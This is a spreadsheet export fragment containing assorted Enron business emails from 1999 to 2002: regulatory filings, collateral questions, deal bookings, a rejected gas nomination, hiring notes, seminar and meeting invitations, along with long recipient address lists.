'alb@cpuc.ca.gov', 'ewo@jmbm.com', 'chj@aelaw.com', 'pjpowerlaw@aol.com', 'tom.roth@et.pge.com', 'karen@klindh.com', 'dcarroll@dbsr.com', 'ronknecht@aol.com', 'craigc@calpine.com', 'ed@clfp.com', 'eyq@cpuc.ca.gov', 'grant_kolling@cerberus.city.palo-alto.ca.us', 'rpetti@ladwp.com', 'jleslie@luce.com', 'gsullivan@sempra.com', 'kmills@cfbf.com', 'ltt@cpuc.ca.gov'})</t>
  </si>
  <si>
    <t>Southern California Generation Coalition Opening Brief in I.99-07_x000D_
 -003</t>
  </si>
  <si>
    <t>________________________________________________________________x000D_
_x000D_
This message and any attachments are intended for the individual or entity_x000D_
named above.  If you are not the intended recipient, please do not read,_x000D_
copy, use or disclose this communication to others; also please notify the_x000D_
sender by replying to this message, and then delete it from your system._x000D_
Thank you._x000D_
________________________________________________________________x000D_
_x000D_
Parties:_x000D_
_x000D_
     Attached in Word 97 format please find the Southern California_x000D_
Generation Coalition Opening Brief in I.99-07-003.  If you have any_x000D_
questions, please contact Norman A. Pedersen at (213) 243-2810 or e-mail_x000D_
him at napedersen@jonesday.com.  Thank you._x000D_
_x000D_
(See attached file: LA1072095.DOC)(See attached file: LA1073281.DOC)(See_x000D_
attached file: LA1073424.DOC)(See attached file: LA1073283.DOC)_x000D_
_x000D_
_x000D_
Jaki Hawkins (213) 243-2848_x000D_
Secretary to Norman A. Pedersen_x000D_
_x000D_
 - LA1072095.DOC_x000D_
 - LA1073281.DOC_x000D_
 - LA1073424.DOC_x000D_
 - LA1073283.DOC</t>
  </si>
  <si>
    <t>Fri, 17 Dec 1999 05:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Working Groups</t>
  </si>
  <si>
    <t xml:space="preserve">Rick asked that I get the US/Canada Goverment Affairs "Working Group" list to _x000D_
everyone, so here it is!_x000D_
_x000D_
gngr_x000D_
</t>
  </si>
  <si>
    <t>Wed, 31 Oct 2001 09:41:59 -0800 (PST)</t>
  </si>
  <si>
    <t>Transwestern Spreadsheets</t>
  </si>
  <si>
    <t>Lynn, per your request attached are spreadsheets of Customers that will be attending TW meeting and a spreadsheet of customers invited to Transwestern Customer Update Mtg. _x000D_
_x000D_
  _x000D_
Also, those that were invited to the Nutcraker are as follows:_x000D_
_x000D_
Dawnell Pace - SW Gas Corp._x000D_
_x000D_
Janette Arreguin - PNM Gas Services_x000D_
_x000D_
Julia Clevenger - US Gas Transportation, Inc._x000D_
_x000D_
Pat Davidson - Southern CA Gas_x000D_
_x000D_
Penny Barry - BP Energy_x000D_
_x000D_
Stephanie Miller - ENA_x000D_
_x000D_
Thanks,_x000D_
Ava-3-5842</t>
  </si>
  <si>
    <t>Fri, 4 Aug 2000 05:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Cash collateral in Canada</t>
  </si>
  <si>
    <t xml:space="preserve">Sara:_x000D_
We have never gotten comfortable with the Canadian cash collateral issue.  _x000D_
You may recall that Shari recently looked into this but her situation was _x000D_
limited to a particular counterparty.  I was never comfortable with the _x000D_
advice that I got from Blake, Cassells and would suggest that we follow up _x000D_
with stikeman which is who Shari worked with.  She may have some updated _x000D_
memos on this in the file she was working on (I think it was Duke)._x000D_
_x000D_
Molly and I never talked about this.  Mark needs to pick someone who should _x000D_
be in charge.  Molly was never interested in meeting to talk globally about _x000D_
this but I think that a meeting with her and Bradford needs to occur.  Take _x000D_
care.  Got to go.  Hope to see you in about 2 weeks._x000D_
_x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
_x000D_
_x000D_
_x000D_
	Sara Shackleton_x000D_
	08/03/00 01:31 PM_x000D_
		 _x000D_
		 To: Carol St Clair/HOU/ECT@ECT_x000D_
		 cc: Mark Taylor/HOU/ECT@ECT_x000D_
		 Subject: Cash collateral in Canada_x000D_
_x000D_
Carol:  Hope all is well.  We are missing you every day._x000D_
_x000D_
(1)  On a "swap" related note, we have a Canadian party requesting the _x000D_
ability to post cash collateral to ENA.  Can you recall where we left off on _x000D_
the issue?  I seem to  remember conflicting advice (Peter's insistence upon _x000D_
the Stikeman memo and ENA simply not agreeing to accept cash) and uncertainty _x000D_
as to how ENA could perfect its interest and what law governs (in cash held _x000D_
in a U.S. account)._x000D_
_x000D_
(2)  On a "credit" related note, I was forwarded the 7/24/00 Margin Exception _x000D_
Report (originally sent to your attention).  What were you doing to follow up _x000D_
on this report?  Yesterday, Mary gave me a copy of a "collateral letter" _x000D_
being sent by Molly Harris.  Did you speak with Mary about working on this _x000D_
project in your absence?_x000D_
_x000D_
Edward Ondarza is moving to EBS.   Stephanie Panus starts on Monday.  That's _x000D_
all the news for now._x000D_
 _x000D_
Talk to you soon.  Sara_x000D_
_x000D_
P.S.  Can you send photos over the net?_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 12:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'breasoner@gibbs-bruns.com'})</t>
  </si>
  <si>
    <t>Let's talk about this language as soon as humanly possible:_x000D_
_x000D_
You have been identified as a person having contact with the power situation _x000D_
in California.  This e-mail is to remind you that the dissemination of _x000D_
information should be given careful consideration.  You should be prudent in _x000D_
the circulation of electronic mail relating to your work and activities.</t>
  </si>
  <si>
    <t>Tue, 25 Jul 2000 07:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Alhamd's Presentations</t>
  </si>
  <si>
    <t xml:space="preserve">Offer him the job._x000D_
_x000D_
_x000D_
_x000D_
Rob Bradley@ENRON_x000D_
07/25/2000 12:40 PM_x000D_
_x000D_
_x000D_
To: Steven J Kean/HOU/EES@EES_x000D_
cc: Andrew Miles/HOU/EES@EES _x000D_
Subject: Alhamd's Presentations_x000D_
_x000D_
FYI--go to the Internet Strategy one for what you need._x000D_
_x000D_
I am pretty sure he will work out with me and Jeff--you can pull the trigger _x000D_
and hire him with my concurrence if you feel comfortable enough._x000D_
_x000D_
- Rob_x000D_
_x000D_
---------------------- Forwarded by Rob Bradley/Corp/Enron on 07/26/2000 _x000D_
12:33 AM ---------------------------_x000D_
Alhamd Alkhayat @ ENRON_DEVELOPMENT   07/25/2000 12:25 PM_x000D_
_x000D_
To: Rob Bradley@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Alhamd's Presentations_x000D_
_x000D_
Rob,_x000D_
_x000D_
I think the meeting with Steve went great.  He asked me to forward you some _x000D_
presentations that I have made, and that you would pass them on to him.  They _x000D_
are here in reverse chrono order.  Pass my regards and enjoy your vacation._x000D_
_x000D_
Cheers_x000D_
_x000D_
Hamd_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 May 2001 16:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: TDC</t>
  </si>
  <si>
    <t xml:space="preserve">thank ;you very much_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kam Keiser_x000D_
05/08/2001 01:20 PM_x000D_
To:	Nelson Ferries/Corp/Enron@ENRON_x000D_
cc:	Scott Neal/HOU/ECT@ECT _x000D_
Subject:	TDC_x000D_
_x000D_
Nelson,_x000D_
_x000D_
I have booked the TDC deal for the remainder of the term.  It is now in the Gulf3 book at Tenn/Zone1.  If locations need to change, and I'm sure they will, please let me know and I will make sure it is hedged correctly.  _x000D_
_x000D_
sitara #778201_x000D_
_x000D_
also,  if you could use the same sitara number every month for the central gas it would help make our reconciliation process much smoother._x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kam_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 06:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'daniel.falcone@enron.com', 'bjorn.hagelmann@enron.com', 'ron.nolte@enron.com', 'sunil.dalal@enron.com', 'manfred.roenz@enron.com', 'burton.mcintyre@enron.com', 'xochitl.figueroa@enron.com', 'terri.harlan@enron.com', 'homan.amiry@enron.com', 'robin.rodrigue@enron.com', 'rahmaan.mwongozi@enron.com', 'tracey.irvin@enron.com', 'minal.dalia@enron.com', 'joyce.kuo@enron.com', "kenneth.d'silva@enron.com", 'rebecca.ford@enron.com', 'jason.moore@enron.com', 'debbie.brackett@enron.com', 'rudi.zipter@enron.com', 'gregory.carraway@enron.com', 'kevin.lee@enron.com', 'clara.carrington@enron.com', 'michael.swaim@enron.com', 'todd.warwick@enron.com', 'christian.lebroc@enron.com', 'chris.abel@enron.com', 'bilal.bajwa@enron.com', 'john.powell@enron.com'})</t>
  </si>
  <si>
    <t>Book Request #615</t>
  </si>
  <si>
    <t xml:space="preserve">This book is set up.  The physical book is also set up in Sitara.  Please _x000D_
contact me if you have any questions/comments._x000D_
_x000D_
Thank you,_x000D_
Susan _x000D_
x3-1462_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Sep 2000 00:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Simple DCF Model</t>
  </si>
  <si>
    <t xml:space="preserve">Per your request!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Dec 2001 20:10:37 -0800 (PST)</t>
  </si>
  <si>
    <t>PGE Tranny Contract</t>
  </si>
  <si>
    <t xml:space="preserve">Steve,_x000D_
_x000D_
Following up on our conversations today, attached is a draft fact sheet and our contract with PGE for 180 MW of capacity on the Intertie.  Because the contract is in the money both today and on an expected future basis, Belden and Calger recommend continued demand-charge payments to retain the contract's  value to the estate.  Based on my reading, the contract is assignable either to a third party or Netco.  If we default, the capacity would revert to PGE and PGE would sell it at a maximum of its tariffed rate, which is what EPMI pays today. _x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 17 Feb 2000 23:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.taylor@enron.com', 'jeffrey.shankman@enron.com'})</t>
  </si>
  <si>
    <t>New Product Approval Request</t>
  </si>
  <si>
    <t xml:space="preserve">Fletcher Sturm would like to transact in US Gas Basis Nymex last day vs. ANR _x000D_
Oklahoma and Nymex last day vs. Trunkline, Louisiana._x000D_
_x000D_
Please offer your approval._x000D_
_x000D_
Mark, please review the attached and offer comments/approval._x000D_
_x000D_
Dale_x000D_
3-9746_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 May 2001 01:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>TransModel Mutual NDA</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Greg Whalley/HOU/ECT on 05/08/2001 08:54 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Michael Walker" &lt;walkerm@kingwoodcable.com&gt; on 05/02/2001 07:50:43 AM_x000D_
To: &lt;greg.whalley@enron.com&gt;_x000D_
cc:  _x000D_
Subject: TransModel Mutual NDA_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Again.? Sorry,?I forgot the attachment  last night_x000D_
?_x000D_
Attached is?a mutual non-disclosure agreement  to facilitate our discussions _x000D_
concerning the TransModel transmission status  system.? I will call you today _x000D_
(Wednesday, 5/2) to discuss how we will  proceed._x000D_
?_x000D_
Michael Walker_x000D_
713-750-5997 (work)_x000D_
713-256-6641?  (mobile)_x000D_
 - TransModel Non Disclosure Agreement.doc_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 08:21:08 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tco_commercial_services@nisource.com'})</t>
  </si>
  <si>
    <t>frozenset({'robert.ramirez@enron.com', 'joann.collins@enron.com', 'kelly.loocke@enron.com', 'john.hodge@enron.com', 'victor.lamadrid@enron.com', 'scott.loving@enron.com'})</t>
  </si>
  <si>
    <t>Late/Pending nom has been rejected: 37147-15052</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
The following Late/Pending nom has been rejected:_x000D_
_x000D_
Company: 000236    Arng: 37147-15052    Eff Date: 2001-11-27_x000D_
_x000D_
                          Nominated_x000D_
           Location        Quantity_x000D_
_x000D_
Receipt    P1037161          10,000_x000D_
Delivery   P1037147          10,000_x000D_
_x000D_
REJECTED REASON: POOL OUT OF BALANCE_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
This document was created by TCO0060  in the DB2P subsystem in TRANS ID SMI0, program TJ90018</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 11:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.vote@enron.com', 'mary.perkins@enron.com', 'ed.wood@enron.com', 'genia.fitzgerald@enron.com', 'michelle.wenz@enron.com', 'margo.reyna@enron.com', 'ann.hicks@enron.com', 'barry.schnapper@enron.com', 'bridget.maronge@enron.com', 'lou.stoler@enron.com', 'theresa.davis@enron.com', 'laurie.lee@enron.com', 'sara.shackleton@enron.com', 'brian.blakely@enron.com', 'gopalakrishnan.subramaniam@enron.com', 'james.richardson@enron.com', 'leslie.linares@enron.com', 'kelly.higgason@enron.com', 'lauren.hagerty@enron.com', 'scott.sefton@enron.com', 'kathleen.carnahan@enron.com', 'frazier.king@enron.com', 'andrea.miller@enron.com', 'bill.brown@enron.com', 'linda.trevino@enron.com', 'david.barru@enron.com', 'becky.tlucek@enron.com', 'peter.heintzelman@enron.com', 'stephen.friedlander@enron.com', 'taffy.milligan@enron.com', 'bob.carter@enron.com', 'susan.bailey@enron.com', 'peter.hayes@enron.com', 'thomas.hiltabrand@enron.com', 'janet.moore@enron.com', 'louis.soldano@enron.com', 'brenda.mcafee@enron.com', 'edwin.essandoh@enron.com', 'daniel.rogers@enron.com', 'barbara.felder@enron.com', 'juan.badillo@enron.com', 'greg.johnston@enron.com', 'david.crews@enron.com', 'gina.calderon@enron.com', 'treasa.kirby@enron.com', 'mingcheng.lian@enron.com', 'shawna.flynn@enron.com', 'paul.garcia@enron.com', 'david.lund@enron.com', 'alan.aronowitz@enron.com', 'neil.meyer@enron.com', 'sharon.butcher@enron.com', 'leslie.hansen@enron.com', 'robin.veariel@enron.com', 'anne.edgley@enron.com', 'diana.parker@enron.com', 'eric.gillaspie@enron.com', 'jeremy.ellis@enron.com', 'karen.cordova@enron.com', 'yao.apasu@enron.com', 'shirley.hudler@enron.com', 'carol.essig@enron.com', 'jimmy.simien@enron.com', 'robert.walker@enron.com', 'nicole.alvino@enron.com', 'rodolfo.delapaz@enron.com', 'natasha.lewis@enron.com', 'harry.collins@enron.com', 'michael.robison@enron.com', 'bret.reich@enron.com', 'kathy.ringblom@enron.com', 'michelle.cash@enron.com', 'cheryl.lipshutz@enron.com', 'tracy.carter@enron.com', 'janet.butler@enron.com', 'karen.jones@enron.com', 'david.grant@enron.com', 'brenda.whitehead@enron.com', 'michelle.hicks@enron.com', 'peter.anderson@enron.com', 'marilyn.rivera@enron.com', 'martin.penkwitz@enron.com', 'sam.round@enron.com', 'dale.rasmussen@enron.com', 'ava.syon@enron.com', 'olivia.du@enron.com', 'trevor.randolph@enron.com', 'lee.huber@enron.com', 'dan.lyons@enron.com', 'dan.boyle@enron.com', 'tobin.alland@enron.com', 'michelle.blaine@enron.com', 'marie.heard@enron.com', 'john.tsui@enron.com', 'susan.wheeler@enron.com', 'kenton.erwin@enron.com', 'dari.dornan@enron.com', 'carol.clair@enron.com', 'tony.pryor@enron.com', 'paulette.obrecht@enron.com', 'patrick.grant@enron.com', 'joana.ryan@enron.com', 'susan.scott@enron.com', 'linda.noske@enron.com', 'julie.downes@enron.com', 'richard.sanders@enron.com', 'choon-boon.heng@enron.com', 'rajesh.chettiar@enron.com', 'denisa.jozana@enron.com', 'mark.taylor@enron.com', 'amy.cooper@enron.com', 'michael.moran@enron.com', 'jim.newgard@enron.com', 'pamela.perry@enron.com', 'martin.rees@enron.com', 'angela.villagomez@enron.com', 'jason.moore@enron.com', 'robert.williams@enron.com', 'ace.roman@enron.com', 'mary.ogden@enron.com', 'kimberlee.bennick@enron.com', 'kathy.siess@enron.com', 'joseph.deffner@enron.com', 'mary.cook@enron.com', 'rob.gay@enron.com', 'lance.schuler-legal@enron.com', 'jeff.nogid@enron.com', 'nicole.mayer@enron.com', 'monty.mcmahen@enron.com', 'gay.arnold@enron.com', 'cathy.moehlman@enron.com', 'sheila.tweed@enron.com', 'david.roland@enron.com', 'eric.benson@enron.com', 'charles.delacey@enron.com', 'lisa.robichaux@enron.com', 'rahul.basu@enron.com', 'candace.kyle@enron.com', 'johan.gerrese@enron.com', 'mark.haedicke@enron.com', 'monica.richards@enron.com', 'wayne.gresham@enron.com', 'lisa.bayley@enron.com', 'larry.lawyer@enron.com', 'connie.castillo@enron.com', 'richard.freed@enron.com', 'matt.maxwell@enron.com', 'regina.karsolich@enron.com', 'carlos.ryerson@enron.com', 'stuart.zisman@enron.com', 'david.dye@enron.com', 'christian.yoder@enron.com', 'scott.donaldson@enron.com', 'rob.walls@enron.com', 'anne.koehler@enron.com', 'maroun.abboudy@enron.com', 'laurie.mayer@enron.com', 'joanne.garner@enron.com', 'chris.herron@enron.com', 'michelle.maynard@enron.com', 'mike.jakubik@enron.com', 'brian.swinford@enron.com', 'kay.young@enron.com', 'terri.bachand@enron.com', 'andrew.ralston@enron.com', 'susan.flynn@enron.com', 'howard.selzer@enron.com', 'laura.howenstine@enron.com', 'vicky.martinez@enron.com', 'nony.flores@enron.com', 'kelly.summers@enron.com', 'sharon.morgan@enron.com', 'robert.george@enron.com', 'tim.proffitt@enron.com', 'nancy.muchmore@enron.com', 'joe.gordon@enron.com', 'carol.mcspadden@enron.com', 'jessie.mata@enron.com', 'brian.kerrigan@enron.com', 'james.hughes@enron.com', 'deb.korkmas@enron.com', 'ann.white@enron.com', 'ann.ballard@enron.com', 'philippe.penet@enron.com', 'drew.fossum@enron.com', 'george.frumkin@enron.com', 'elizabeth.lay@enron.com', 'ned.crady@enron.com', 'ananda.mukerji@enron.com', 'shari.stack@enron.com', 'edson.pavao@enron.com', 'sarah.wesner@enron.com', 'gareth.bahlmann@enron.com', 'rita.bahner@enron.com', 'denise.almoina@enron.com', 'tana.jones@enron.com', 'hong.shen@enron.com', 'gerry.willis@enron.com', 'danny.clark@enron.com', 'lori.pinder@enron.com', 'david.bargainer@enron.com', 'becky.stephens@enron.com', 'lisa.bills@enron.com', 'bonnie.nelson@enron.com', 'lois.hendricks@enron.com', 'brenda.funk@enron.com', 'zuzana.strmenova@enron.com', 'shari.mao@enron.com', 'lewis.worthy@enron.com', 'zulema.ibarra@enron.com', 'ed.iii@enron.com', 'dorothy.mccoppin@enron.com', 'robbi.rossi@enron.com', 'kristina.mordaunt@enron.com', 'deborah.rogers@enron.com', 'andrew.fastow@enron.com', 'suzanne.kelly@enron.com', 'annie.ng@enron.com', 'david.nutt@enron.com', 'larry.pardue@enron.com', 'george.kubove@enron.com', 'philip.crowley@enron.com', 'eileen.kisluk@enron.com', 'doug.mcdowell@enron.com', 'kevin.howard@enron.com', 'barbara.gray@enron.com', 'betty.tauzier@enron.com', 'staci.holtzman@enron.com', 'kathleen.williams@enron.com', 'dan.hyvl@enron.com', 'dolores.escamilla@enron.com', 'jeremy.thirsk@enron.com', 'abrar.sait@enron.com', 'kathy.lynn@enron.com', 'kay.mann@enron.com', 'jivko.savov@enron.com', 'elizabeth.linnell@enron.com', 'robina.barker-bennett@enron.com', 'vicki.sharp@enron.com', 'tim.despain@enron.com', 'barry.mendelsohn@enron.com', 'trushar.patel@enron.com', 'joseph.galan@enron.com', 'charles.cheek@enron.com', 'prashant.mitta@enron.com', 'nancy.corbet@enron.com', 'clement.abrams@enron.com', 'betty.coneway@enron.com', 'michael.garberding@enron.com', 'barton.clark@enron.com', 'tanja.murray@enron.com', 'mike.smith@enron.com', 'james.keller@enron.com', 'stacy.dickson@enron.com', 'kelly.boots@enron.com', 'ravi.thuraisingham@enron.com', 'juliana.sherman@enron.com', 'christi.nicolay@enron.com', 'stephanie.mcmurray@enron.com', 'michael.kopper@enron.com', 'patricia.dechow@enron.com', 'renee.louis@enron.com', 'frank.smith@enron.com', 'brent.hendry@enron.com', 'brian.hendon@enron.com', 'bertrand.loubieres@enron.com', 'trandyyoung@enron.com', 'tami.scrudder@enron.com', 'jodi.coulter@enron.com', 'cedric.burgher@enron.com', 'stephen.gray@enron.com', 'roger.balog@enron.com', 'james.timmins@enron.com', 'elizabeth.sager@enron.com', 'paul.chivers@enron.com', 'grant.zimmerman@enron.com', 'greg.caudell@enron.com', 'john.viverito@enron.com', 'stephanie.casas@enron.com', 'mary.birmingham@enron.com', 'linda.lawrence@enron.com', 'maria.pavlou@enron.com', 'darlene.mckeever@enron.com', 'frank.sayre@enron.com', 'robin.hill@enron.com', 'mary.berg@enron.com', 'bret.scholtes@enron.com', 'marianne.castano@enron.com', 'john.schwartzenburg@enron.com', 'luis.derrota@enron.com', 'marilyn.colbert@enron.com', 'william.krenz@enron.com', 'janice.moore@enron.com', 'phenicia.olivier@enron.com', 'beverly.lakes@enron.com', 'kelly.lane@enron.com', 'cindy.richardson@enron.com', 'andrew.wu@enron.com', 'becky.zikes@enron.com', 'christina.finelli@enron.com', 'shonnie.daniel@enron.com', 'kristy.carnes@enron.com', 'linda.hawkins@enron.com', 'yaron.shaham@enron.com', 'chris.loehr@enron.com', 'linda.guinn@enron.com', 'eric.mason@enron.com', 'donald.herrick@enron.com', 'john.novak@enron.com', 'victoria.martinez@enron.com', 'diane.pope@enron.com', 'britt.davis@enron.com', 'stephanie.moorehead@enron.com', 'kriste.sullivan@enron.com', 'julia.chin@enron.com', 'bonnie.white@enron.com', 'sean.long@enron.com', 'andrea.mainelli@enron.com', 'steve.hooser@enron.com', 'marcus.pullicino@enron.com', 'melinda.pharms@enron.com', 'jim.armogida@enron.com', 'robert.callan@enron.com', 'jeffrey.hodge@enron.com', 'cynthia.harkness@enron.com', 'kim.wilkie@enron.com', 'scott.dieball@enron.com', 'larry.derrett@enron.com', 'gail.brownfeld@enron.com', 'miguel.mendoza@enron.com', 'blanca.bollom@enron.com', 'sarah.heineman@enron.com', 'ashwin.punde@enron.com', 'joyce.dorsey@enron.com', 'richard.quek@enron.com', 'mark.holsworth@enron.com', 'stuart.schardin@enron.com', 'debra.perlingiere@enron.com', 'clint.reck@enron.com', 'peter.vecchio@enron.com', 'robert.eickenroht@enron.com', 'lisa.mellencamp@enron.com', 'bill.rapp@enron.com', 'travis.mccullough@enron.com', 'matthew.berry@enron.com', 'ranabir.dutt@enron.com', 'simon.harrison@enron.com', 'blanca.franco@enron.com', 'lisa.lees@enron.com', 'nera.swisher@enron.com', 'bruce.lundstrom@enron.com', 'stephanie.goldman@enron.com', 'martha.braddy@enron.com', 'marion.sczykutowicz@enron.com', 'michelle.lawless@enron.com', 'teresa.bushman@enron.com', 'colleen.raker@enron.com', 'jennifer.hillegonds@enron.com', 'anne.yaeger@enron.com', 'ben.glisan@enron.com', 'simon.crowe@enron.com', 'inez.dauterive@enron.com', 'daniel.castagnola@enron.com', 'mary.heinitz@enron.com', 'rex.rogers@enron.com'})</t>
  </si>
  <si>
    <t>Lexis Presents Cyberlaw &amp; Telecommunications</t>
  </si>
  <si>
    <t>What are some legal issues we should be aware of as e Business/eTrade chang=_x000D_
e=20_x000D_
our way to do business?   Do you know Lexis Search Advisor?  Please join Ed=_x000D_
=20_x000D_
Chang, Lexis attorney for a Cyberlaw &amp; Telecommunications presentation in=_x000D_
=20_x000D_
Conference Room EB 47C2 on Tuesday, 6/20 from 12:00 noon to 1:30 PM.   Lexi=_x000D_
s=20_x000D_
provides lunch.  R.S.V.P. to Sylvia Hu x36775 by noon, Monday (6/19).=20_x000D_
_x000D_
Thanks,_x000D_
Sylvia Hu_x000D_
Corporate and Law Information Services_x000D_
x36775_x000D_
_x000D_
_x000D_
_x000D_
   Come discover LEXIS-NEXIS and it=01,s vast_x000D_
 collection of information on=20_x000D_
CYBERLAW and TELECOMMUNICATIONS_x000D_
_x000D_
Learn how to monitor the latest cases and legislation in these emerging are=_x000D_
as=20_x000D_
of law._x000D_
_x000D_
Find out what new cyberlaw journals=20_x000D_
LEXIS-NEXIS has recently acquired._x000D_
_x000D_
See how easy it is to locate FCC Cases,=20_x000D_
FCC Licenses, PUC Decisions and Reports,=20_x000D_
and Telecommunications News._x000D_
_x000D_
Watch as LEXIS-NEXIS SEARCH ADVISOR practically does all of your research f=_x000D_
or=20_x000D_
you.</t>
  </si>
  <si>
    <t>Fri, 7 Jul 2000 03:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>you going out to lunch today</t>
  </si>
  <si>
    <t>Tue, 4 Jan 2000 23:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Petition for Summer Internship</t>
  </si>
  <si>
    <t xml:space="preserve">Celeste,_x000D_
_x000D_
I am recommending Jason Sokolov for summer internship with Enron._x000D_
Jason is currently working part-time for Mike Roberts and makes_x000D_
very valuable contribution  to a number on-going projects._x000D_
_x000D_
We are very happy with his performance and see him as a valuable future_x000D_
Enron employee._x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 01/05/2000 _x000D_
07:30 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Jason Sokolov                           01/04/2000 01:32 PM_x000D_
	_x000D_
_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Petition for Summer Internship_x000D_
_x000D_
Vince:_x000D_
_x000D_
As we discussed earlier, I attached the copy of the petition for my summer _x000D_
internship with Enron Analyst and Associate group._x000D_
I also have the hard copy of the letter, which I will deliver to you _x000D_
presonally._x000D_
_x000D_
I am looking forward to, finally, become an official Enron employee.  Thank _x000D_
you very much for your valuable contributions to_x000D_
my experience with the company._x000D_
_x000D_
Jason Sokolov_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Nov 2001 10:53:55 -0800 (PST)</t>
  </si>
  <si>
    <t>Port Calc Access</t>
  </si>
  <si>
    <t>Can you do me a favor similar to Kam's previous request:  Can you add to my current profile all the books that Scott Palmer currently has calculation access to.  Could you also set Bruce Mills, Kristen Clause and Edward Brady up like Scott Palmer.  Additionally can you also set up Ashley Worthing like Anne Bike.  Thanks for you help and shout with any questions._x000D_
PL</t>
  </si>
  <si>
    <t>Mon, 4 Feb 2002 09:12:56 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'l..mims@enron.com', 's..shively@enron.com', 'h..lewis@enron.com', 'deirdre.mccaffrey@enron.com', 'geoff.storey@enron.com', 'bryant.frihart@enron.com'})</t>
  </si>
  <si>
    <t>Updated: Central Region Customer Priority Ranking</t>
  </si>
  <si>
    <t>When: Monday, February 04, 2002 1:00 PM-2:00 PM (GMT-06:00) Central Time (US &amp; Canada)._x000D_
Where: ECS 06112_x000D_
_x000D_
*~*~*~*~*~*~*~*~*~*_x000D_
_x000D_
NEW TIME_x000D_
Please accept this invitation, as it will automatically populate onto your calendars._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Irena Hogan_x000D_
x36143</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 05:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Search Gala</t>
  </si>
  <si>
    <t>Im out of town_x000D_
m</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 13:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'coganja@aol.com'})</t>
  </si>
  <si>
    <t>Re: Griffith Sales Proposal</t>
  </si>
  <si>
    <t xml:space="preserve">I have this on my agenda for later today.  If I get back to you late today is that OK?_x000D_
_x000D_
C_x000D_
_x000D_
_x000D_
   _x000D_
_x000D_
	Enron Capital &amp; Trade Resources Corp.  From:  CoganJA@aol.com                           04/16/2001 08:16 AM	_x000D_
		_x000D_
_x000D_
_x000D_
To:	sbreen@czn.com, cfoster@enron.com_x000D_
cc:	 _x000D_
Subject:	Griffith Sales Proposal_x000D_
_x000D_
_x000D_
Good morning, _x000D_
_x000D_
Hope you had a great Easter weekend. _x000D_
_x000D_
Attached are two (2) word files for your review.  First, there is the latest  _x000D_
draft of the Sales Proposal which reflects the best efforts and intra day  _x000D_
provisions.  Second, there is the Alternate Nominations provisions.  I spoke  _x000D_
with PPL this morning and said that I would try to get both of these  _x000D_
documents to them today.  Your timely review and comments are greatly  _x000D_
appreciated. _x000D_
_x000D_
The Alternate Nominations language is being separately provided at the  _x000D_
request of PPL so that they can review it.  If they would like to have it  _x000D_
incorporated, it can easily incorporated into the proposal and/or agreement. _x000D_
_x000D_
Chris, I used the working draft of the Enron/Citizens agreement from our  _x000D_
meeting last Monday in Houston to draft the Alternate Nominations language.   _x000D_
That draft did not provide for a price differentiation for nominations  _x000D_
between 8:30 and 9:00 am CPT.  Should there be one? _x000D_
_x000D_
Best regard, _x000D_
_x000D_
John _x000D_
_x000D_
John A. Cogan _x000D_
_x000D_
Johnco Group _x000D_
3629 Lake Kristin Drive _x000D_
Gretna, LA 70056 _x000D_
Phone  (504) 392-7557 _x000D_
Cell      (504) 491-2874 _x000D_
Fax      (208) 730-4713_x000D_
 - PPL - Griffith Gas Sales Proposal-rev 4-6-01 Amend 4-16-01.ZIP _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 08:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wednesday</t>
  </si>
  <si>
    <t>Hey,_x000D_
_x000D_
Forgive my delay in calling you back, but I haven't come up for air today._x000D_
I will try to call you later today or tomorrow._x000D_
_x000D_
Patti</t>
  </si>
  <si>
    <t>Thu, 12 Oct 2000 02:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Help, Help!</t>
  </si>
  <si>
    <t>I can help, but what's your timing?</t>
  </si>
